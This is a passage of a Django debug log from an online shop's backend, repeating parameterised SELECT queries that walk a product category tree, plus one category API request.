"shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 02:37:31,437 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 02:37:31,440 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 02:37:31,443 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 02:37:31,446 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 02:37:31,448 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 02:37:31,450 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 02:37:31,452 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 02:37:31,456 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 02:37:31,458 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 02:37:31,460 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 02:37:31,463 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 02:37:31,465 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 02:37:31,469 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 02:37:31,471 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 02:37:31,473 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 02:37:31,475 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 02:37:31,478 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 02:37:31,480 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 02:37:31,484 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 02:37:31,486 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 02:37:31,488 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 02:37:31,491 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 02:37:31,493 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 02:37:31,496 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 02:37:31,499 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 02:37:31,501 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 02:37:31,503 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 02:37:31,506 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 02:37:31,509 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 02:37:31,512 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 02:37:31,514 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 02:37:31,516 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 02:37:31,518 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 02:37:31,520 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 02:37:31,523 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 02:37:31,525 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 02:37:31,528 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 02:37:31,531 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 02:37:31,533 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 02:37:31] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 02:37:33,468 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 02:37:33,476 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 02:37:33,481 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 02:37:33,484 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 02:37:33,489 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 02:37:33,493 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 02:37:33,497 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 02:37:33,500 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 02:37:33,504 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 02:37:33,509 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 02:37:33,512 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 02:37:33,515 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 02:37:33,519 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 02:37:33,522 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 02:37:33,527 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 02:37:33,530 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 02:37:33,534 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 02:37:33,537 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 02:37:33,541 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 02:37:33,546 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 02:37:33,550 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 02:37:33,554 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 02:37:33,557 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 02:37:33,561 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 02:37:33,564 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 02:37:33,569 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 02:37:33,572 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 02:37:33,575 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM 